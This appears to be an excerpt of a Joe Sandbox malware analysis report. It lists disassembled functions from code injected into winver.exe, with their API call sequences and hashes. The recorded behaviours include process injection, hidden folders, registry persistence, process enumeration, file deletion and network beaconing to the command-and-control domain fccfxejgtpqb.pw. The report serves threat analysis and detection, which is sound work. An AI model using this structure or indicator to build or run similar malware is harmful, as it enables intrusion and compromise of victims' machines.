                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocCreateMemoryProcessRemoteThreadVirtualWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1718980022-0
                                                                                                                                                                                          • Opcode ID: 20e57d88da2030ec20683870e6424b515fd74008d7ab68b95a7bc2f489d980e4
                                                                                                                                                                                          • Instruction ID: ddab67570ff2000dfcb3a3ba602a6dd25ab21d20abd24e295af70045eb2888e8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 20e57d88da2030ec20683870e6424b515fd74008d7ab68b95a7bc2f489d980e4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D115132600205BFFF215F25CC85F963BA9EF81794F188055FE08BE199D770A521DBA8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F0292D Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 169filestringsleepCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(02F02925,00000008,?,00000000,02F02811,00000000), ref: 02F02932
                                                                                                                                                                                            • Part of subcall function 02F00C9C: GetProcAddress.KERNEL32(02F02811,02F0290A), ref: 02F00CA9
                                                                                                                                                                                          • WSAStartup.WS2_32(00000202,00000000), ref: 02F02957
                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,01400000,00003000,00000004), ref: 02F0296F
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02F0299D), ref: 02F029AC
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02F029D4), ref: 02F029E3
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02F02A0B), ref: 02F02A1A
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02F02A94
                                                                                                                                                                                            • Part of subcall function 02F02683: CreateFileA.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000), ref: 02F0269E
                                                                                                                                                                                            • Part of subcall function 02F02683: GetFileSize.KERNEL32(?,00000000), ref: 02F026B7
                                                                                                                                                                                            • Part of subcall function 02F02683: ReadFile.KERNELBASE(02F0298A,?,00000000,?,00000000), ref: 02F026DB
                                                                                                                                                                                            • Part of subcall function 02F02683: CloseHandle.KERNEL32(02F0298A), ref: 02F026EC
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02F02AD8
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02F02B2E
                                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02F02B42
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Deletelstrcat$AddressAllocCloseCreateHandleLibraryLoadProcReadSizeSleepStartupVirtual
                                                                                                                                                                                          • String ID: `nIu
                                                                                                                                                                                          • API String ID: 3655464437-1509933002
                                                                                                                                                                                          • Opcode ID: 123cee287050aa4130abb0b2e68c87aa3392ee7ebd80efcf2861b6cc2cd8a842
                                                                                                                                                                                          • Instruction ID: ee125d008c763b65e922deb913ec8aa6847950c085649244760556575f980a7e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 123cee287050aa4130abb0b2e68c87aa3392ee7ebd80efcf2861b6cc2cd8a842
                                                                                                                                                                                          • Instruction Fuzzy Hash: B05154719002149EEF226B718DCCFAB76BDFF40785F0444A6AF45EA095DE349680EEB1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F00643 Relevance: 16.6, APIs: 11, Instructions: 143synchronizationCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000), ref: 02F0065A
                                                                                                                                                                                            • Part of subcall function 02F0067C: LoadLibraryA.KERNELBASE(02F00673,00000009,?,00000000), ref: 02F00681
                                                                                                                                                                                            • Part of subcall function 02F0067C: lstrcmpiA.KERNEL32(?,00000000), ref: 02F006EB
                                                                                                                                                                                            • Part of subcall function 02F0067C: Sleep.KERNELBASE(00001388), ref: 02F006FE
                                                                                                                                                                                            • Part of subcall function 02F0067C: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 02F0071F
                                                                                                                                                                                            • Part of subcall function 02F0067C: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 02F00731
                                                                                                                                                                                            • Part of subcall function 02F0067C: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 02F00752
                                                                                                                                                                                            • Part of subcall function 02F0067C: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 02F00764
                                                                                                                                                                                            • Part of subcall function 02F0067C: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 02F00785
                                                                                                                                                                                            • Part of subcall function 02F0067C: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 02F00797
                                                                                                                                                                                            • Part of subcall function 02F0067C: VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 02F007AB
                                                                                                                                                                                            • Part of subcall function 02F026F9: CreateFileA.KERNELBASE(?,40000000,00000003,00000000,?,00000080,00000000,?,00000000), ref: 02F02715
                                                                                                                                                                                            • Part of subcall function 02F026F9: SetFilePointer.KERNELBASE(?,00000000,00000000,00000002), ref: 02F02732
                                                                                                                                                                                            • Part of subcall function 02F026F9: WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 02F0274E
                                                                                                                                                                                            • Part of subcall function 02F026F9: CloseHandle.KERNEL32(?), ref: 02F0275F
                                                                                                                                                                                            • Part of subcall function 02F00811: RegCreateKeyExA.KERNELBASE(00000000,02F00840,0000002E,?,?,?,?,?,00000002,?,00000000,00000000), ref: 02F00876
                                                                                                                                                                                            • Part of subcall function 02F00811: RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,80000001,00000000), ref: 02F0089D
                                                                                                                                                                                            • Part of subcall function 02F00811: RegCloseKey.KERNELBASE(?), ref: 02F008A9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFile$AttributesDirectory$Close$AllocHandleLibraryLoadMutexPointerSleepValueVirtualWritelstrcmpi
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2311107590-0
                                                                                                                                                                                          • Opcode ID: 23fe9d41b4c0fd8f85a64b07ac5772dc61afcf4539fa5e17d3a9c2967f868177
                                                                                                                                                                                          • Instruction ID: f248af9eafa8d88603038d7ab82f73c7d47eeed70a478c35015bfddb8683cc41
                                                                                                                                                                                          • Opcode Fuzzy Hash: 23fe9d41b4c0fd8f85a64b07ac5772dc61afcf4539fa5e17d3a9c2967f868177
                                                                                                                                                                                          • Instruction Fuzzy Hash: 485130B2504214AFDB12AB60CC88FAA77BCEF44744F05059EAB85EF085DE709690CEA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F0067C Relevance: 15.1, APIs: 10, Instructions: 122libraryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(02F00673,00000009,?,00000000), ref: 02F00681
                                                                                                                                                                                            • Part of subcall function 02F00C9C: GetProcAddress.KERNEL32(02F02811,02F0290A), ref: 02F00CA9
                                                                                                                                                                                            • Part of subcall function 02F02597: lstrcat.KERNEL32(02F02634,00000000), ref: 02F025DE
                                                                                                                                                                                            • Part of subcall function 02F006C2: lstrcmpiA.KERNEL32(?,00000000), ref: 02F006EB
                                                                                                                                                                                            • Part of subcall function 02F006C2: Sleep.KERNELBASE(00001388), ref: 02F006FE
                                                                                                                                                                                            • Part of subcall function 02F006C2: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 02F0071F
                                                                                                                                                                                            • Part of subcall function 02F006C2: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 02F00731
                                                                                                                                                                                            • Part of subcall function 02F006C2: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 02F00752
                                                                                                                                                                                            • Part of subcall function 02F006C2: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 02F00764
                                                                                                                                                                                            • Part of subcall function 02F006C2: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 02F00785
                                                                                                                                                                                            • Part of subcall function 02F006C2: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 02F00797
                                                                                                                                                                                            • Part of subcall function 02F006C2: VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 02F007AB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesCreateDirectoryFile$AddressAllocLibraryLoadProcSleepVirtuallstrcatlstrcmpi
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2102637170-0
                                                                                                                                                                                          • Opcode ID: 5de239d9be66570cd2289521d95d90d9cab5e80f55aeab0bdb7006df202fe909
                                                                                                                                                                                          • Instruction ID: 8b6ced52c6257eac7bc10743625d25943bd0e1b55181326e7cf6d88f68503eeb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5de239d9be66570cd2289521d95d90d9cab5e80f55aeab0bdb7006df202fe909
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F411FB2500214AFDF12AB60CCC8FAA77BCEF44744F05049DAB85EF085DE349680CEA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F006C2 Relevance: 13.6, APIs: 9, Instructions: 97sleepmemorystringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,00000000), ref: 02F006EB
                                                                                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 02F006FE
                                                                                                                                                                                          • CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 02F0071F
                                                                                                                                                                                          • SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 02F00731
                                                                                                                                                                                          • CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 02F00752
                                                                                                                                                                                          • SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 02F00764
                                                                                                                                                                                            • Part of subcall function 02F02597: lstrcat.KERNEL32(02F02634,00000000), ref: 02F025DE
                                                                                                                                                                                          • CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 02F00785
                                                                                                                                                                                          • SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 02F00797
                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 02F007AB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesCreateDirectoryFile$AllocSleepVirtuallstrcatlstrcmpi
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2015199959-0
                                                                                                                                                                                          • Opcode ID: 1c226179281e77d9add93f1d77d7a7ba9467f2847751cd0325fb52aca6bbedbc
                                                                                                                                                                                          • Instruction ID: 7009c40524069369fb1c3b099d2bd595164cbaf3ff01043dba5f735b09a24b68
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c226179281e77d9add93f1d77d7a7ba9467f2847751cd0325fb52aca6bbedbc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E31FFB25002149FDF16AB60CCC8FAA73ACEF44744F4504ADAB85EF085DE749680CEA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F029A6 Relevance: 10.6, APIs: 7, Instructions: 130sleepfilestringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02F0299D), ref: 02F029AC
                                                                                                                                                                                            • Part of subcall function 02F029DD: lstrcat.KERNEL32(00000000,02F029D4), ref: 02F029E3
                                                                                                                                                                                            • Part of subcall function 02F029DD: lstrcat.KERNEL32(00000000,02F02A0B), ref: 02F02A1A
                                                                                                                                                                                            • Part of subcall function 02F029DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02F02A94
                                                                                                                                                                                            • Part of subcall function 02F029DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02F02AD8
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02F02B2E
                                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02F02B42
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFilelstrcat$Sleep
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 588723932-0
                                                                                                                                                                                          • Opcode ID: a59d9b3575d39faaedf29f35c9c8ec066547d1ec0f6634f348c18150469a5b98
                                                                                                                                                                                          • Instruction ID: 3ca701afb72ffdd9a6ed082a981da5c9392b0c5c14ef5d74d2706bc73805186a
                                                                                                                                                                                          • Opcode Fuzzy Hash: a59d9b3575d39faaedf29f35c9c8ec066547d1ec0f6634f348c18150469a5b98
                                                                                                                                                                                          • Instruction Fuzzy Hash: E04123719002189EDF226B71CDCCFAB76BDEF40745F0445A6AF45EA091DE349680EEB1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F02F3F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 85stringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 201 2f02f3f-2f02f7e call 2f03653 call 2f03673 lstrlen call 2f03673 call 2f02f88 211 2f02f80-2f02f83 201->211 212 2f02fad-2f02feb call 2f0363b 201->212 214 2f02f86 211->214 215 2f02fee-2f02ffc send 211->215 212->215 214->212 217 2f03042-2f03054 closesocket 215->217 218 2f02ffe 215->218 220 2f03001-2f03015 send 218->220 220->217 221 2f03017-2f0301c 220->221 221->220 222 2f0301e-2f03023 221->222 223 2f03026-2f03038 recv 222->223 223->217 224 2f0303a-2f0303e 223->224 224->223 225 2f03040 224->225 225->217
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlen.KERNEL32(fccfxejgtpqb.pw,00000000,02F02F2E,00000011,?,00000000,00000011,00000000,/EiDQjNbWEQ/,00000000), ref: 02F02F53
                                                                                                                                                                                            • Part of subcall function 02F02F88: send.WS2_32(?,00000000,00000000,00000000), ref: 02F02FF4
                                                                                                                                                                                            • Part of subcall function 02F02F88: send.WS2_32(?,02F02A30,02F02A2C,00000000), ref: 02F0300D
                                                                                                                                                                                            • Part of subcall function 02F02F88: recv.WS2_32(?,02F02A30,00A00000,00000000), ref: 02F03030
                                                                                                                                                                                            • Part of subcall function 02F02F88: closesocket.WS2_32(?), ref: 02F0304A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: send$closesocketlstrlenrecv
                                                                                                                                                                                          • String ID: fccfxejgtpqb.pw
                                                                                                                                                                                          • API String ID: 1577144637-3332661483
                                                                                                                                                                                          • Opcode ID: 47e1b1d1e09dae78ecab814af72e97c8beb8c55764ffd7795c611f6a9b2faa7b
                                                                                                                                                                                          • Instruction ID: e59e55f8cd238cbcf5d7055b08cb8d032030521242451e78f8c501328a345ec2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 47e1b1d1e09dae78ecab814af72e97c8beb8c55764ffd7795c611f6a9b2faa7b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 12219372B00154ABEB125E24CC84F9A7BA9EF447C9F0840D4FF08AB195D735AA10AFA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F00CE8 Relevance: 10.6, APIs: 7, Instructions: 64sleepprocessCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 226 2f00ce8-2f00cfd 227 2f00d03-2f00d10 CreateToolhelp32Snapshot 226->227 227->227 228 2f00d12-2f00d45 Sleep Process32First 227->228 229 2f00db5-2f00ddb FindCloseChangeNotification Sleep 228->229 230 2f00d47-2f00d53 228->230 229->227 231 2f00d54-2f00d63 230->231 232 2f00d65-2f00d7a 231->232 233 2f00d8e-2f00da6 Process32Next 231->233 232->233 237 2f00d7c-2f00d88 call 2f00de0 FindCloseChangeNotification 232->237 233->229 234 2f00da8-2f00daa 233->234 234->231 236 2f00dac-2f00db3 234->236 236->231 237->233
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02F00D07
                                                                                                                                                                                          • Sleep.KERNELBASE(000003E8), ref: 02F00D1D
                                                                                                                                                                                          • Process32First.KERNEL32(?,00000000), ref: 02F00D3D
                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000,0000090B,00000000), ref: 02F00D88
                                                                                                                                                                                          • Process32Next.KERNEL32(?,?), ref: 02F00D9E
                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 02F00DCA
                                                                                                                                                                                          • Sleep.KERNELBASE(000003E8), ref: 02F00DD5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ChangeCloseFindNotificationProcess32Sleep$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1902139912-0
                                                                                                                                                                                          • Opcode ID: 7ef9ee58ba518d41f3acc58a6d1fc59d2da839a49c47249353964cec8b1c453b
                                                                                                                                                                                          • Instruction ID: 2cfc4efe58b5642f90d4287799fe6004f3beeaaa4275b213007965a9fec0cc9e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ef9ee58ba518d41f3acc58a6d1fc59d2da839a49c47249353964cec8b1c453b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 71217131902118ABEF225F14CC94BE9B7B9AF08741F0801D9EA1AEA1D5CF715A90CF65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F0261C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54stringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 240 2f0261c-2f0262a call 2f03653 ExpandEnvironmentStringsA 243 2f02636-2f02640 240->243 244 2f0262c 240->244 245 2f02642-2f0265b call 2f0265e 243->245 246 2f0266c-2f02679 lstrcat 243->246 247 2f02634 244->247 248 2f0262f call 2f02597 244->248 252 2f026b9-2f026c6 245->252 253 2f0265d-2f02666 lstrcat 245->253 250 2f0267f-2f02680 246->250 247->250 248->247 254 2f026c8-2f026e3 ReadFile 252->254 255 2f026e9-2f026f6 CloseHandle 252->255 253->246 254->255 256 2f026e5-2f026e6 254->256 256->255
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(02F0260C,00000010,?,?,02F0298A,00000104), ref: 02F02621
                                                                                                                                                                                          • lstrcat.KERNEL32(02F0298A,02F02659), ref: 02F02666
                                                                                                                                                                                          • lstrcat.KERNEL32(02F0298A,02F0298A), ref: 02F02679
                                                                                                                                                                                            • Part of subcall function 02F02597: lstrcat.KERNEL32(02F02634,00000000), ref: 02F025DE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$EnvironmentExpandStrings
                                                                                                                                                                                          • String ID: \AC\
                                                                                                                                                                                          • API String ID: 2903145849-1749977576
                                                                                                                                                                                          • Opcode ID: 1a1455d68d8f3bd8c3de392b281e5d27977fe7010f103cb395b91df9d1250492
                                                                                                                                                                                          • Instruction ID: beac57dd5c8ee1c15dbbce058d23a0f2d23c2e185a565310de32dc9b34e7f8ed
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a1455d68d8f3bd8c3de392b281e5d27977fe7010f103cb395b91df9d1250492
                                                                                                                                                                                          • Instruction Fuzzy Hash: 70115BB1500508EFEF029FA0CC89EADBBB9FF10384F0440A5EE45EA061D7308A51EFA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F029DD Relevance: 9.1, APIs: 6, Instructions: 112stringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 258 2f029dd-2f02a1a call 2f03653 lstrcat call 2f02501 call 2f02a14 call 2f03653 lstrcat 268 2f02a20-2f02a2b call 2f02b4d 258->268 270 2f02a30-2f02a43 call 2f034f7 268->270 272 2f02a48-2f02a4f 270->272 272->268 273 2f02a51-2f02a6d call 2f0343f call 2f02683 272->273 278 2f02a9a-2f02ab1 call 2f02683 273->278 279 2f02a6f 273->279 284 2f02ab3 278->284 285 2f02ade-2f02af5 call 2f02683 278->285 279->278 280 2f02a71-2f02a86 call 2f026f9 279->280 280->278 289 2f02a88 280->289 284->285 287 2f02ab5-2f02aca call 2f026f9 284->287 294 2f02af7 285->294 295 2f02af8-2f02b11 call 2f02e97 285->295 287->285 296 2f02acc 287->296 289->278 292 2f02a8a-2f02a94 DeleteFileA 289->292 292->278 294->295 300 2f02b13-2f02b1c call 2f03057 295->300 301 2f02b34-2f02b48 Sleep 295->301 296->285 298 2f02ace-2f02ad8 DeleteFileA 296->298 298->285 300->301 304 2f02b1e-2f02b2e DeleteFileA 300->304 301->272 304->301
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02F029D4), ref: 02F029E3
                                                                                                                                                                                            • Part of subcall function 02F02A14: lstrcat.KERNEL32(00000000,02F02A0B), ref: 02F02A1A
                                                                                                                                                                                            • Part of subcall function 02F02A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02F02A94
                                                                                                                                                                                            • Part of subcall function 02F02A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02F02AD8
                                                                                                                                                                                            • Part of subcall function 02F02A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02F02B2E
                                                                                                                                                                                            • Part of subcall function 02F02A14: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02F02B42
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFile$lstrcat$Sleep
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4261675396-0
                                                                                                                                                                                          • Opcode ID: f25f655f168d47ae09fd180d96ac9ab6615c369bbaafbdd74acb6aa40e99586a
                                                                                                                                                                                          • Instruction ID: bad94de65216555a867dd756a1f8a72e1f337ff6808bb394cea6aa67cccbf29c
                                                                                                                                                                                          • Opcode Fuzzy Hash: f25f655f168d47ae09fd180d96ac9ab6615c369bbaafbdd74acb6aa40e99586a
                                                                                                                                                                                          • Instruction Fuzzy Hash: D74123719002599EDF226B71CDCCFAB76BDEF40789F0444A6AF45EA085DE349680DEB0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F02F38 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59networkCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 325 2f02f38-2f02f3b 326 2f02fb1-2f02ffc call 2f0363b send 325->326 327 2f02f3d 325->327 331 2f03042-2f03054 closesocket 326->331 332 2f02ffe 326->332 327->326 333 2f03001-2f03015 send 332->333 333->331 334 2f03017-2f0301c 333->334 334->333 335 2f0301e-2f03023 334->335 336 2f03026-2f03038 recv 335->336 336->331 337 2f0303a-2f0303e 336->337 337->336 338 2f03040 337->338 338->331
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • send.WS2_32(?,00000000,00000000,00000000), ref: 02F02FF4
                                                                                                                                                                                          • send.WS2_32(?,02F02A30,02F02A2C,00000000), ref: 02F0300D
                                                                                                                                                                                          • recv.WS2_32(?,02F02A30,00A00000,00000000), ref: 02F03030
                                                                                                                                                                                          • closesocket.WS2_32(?), ref: 02F0304A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: send$closesocketrecv
                                                                                                                                                                                          • String ID: fccfxejgtpqb.pw
                                                                                                                                                                                          • API String ID: 3431254638-3332661483
                                                                                                                                                                                          • Opcode ID: 3de71ac913557117b39ba19aefa8f7a10d2ba1ba6dbe92ee6fcdf69db35a4dda
                                                                                                                                                                                          • Instruction ID: 0c08ca304cab006b641f2c11d7db511eb2500ba1c5bd26652892f92f8235040b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3de71ac913557117b39ba19aefa8f7a10d2ba1ba6dbe92ee6fcdf69db35a4dda
                                                                                                                                                                                          • Instruction Fuzzy Hash: FD115172B00014ABEF125E28CC85F9A7BF9EF44788F0541D4FF08AA195D335E9109FA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

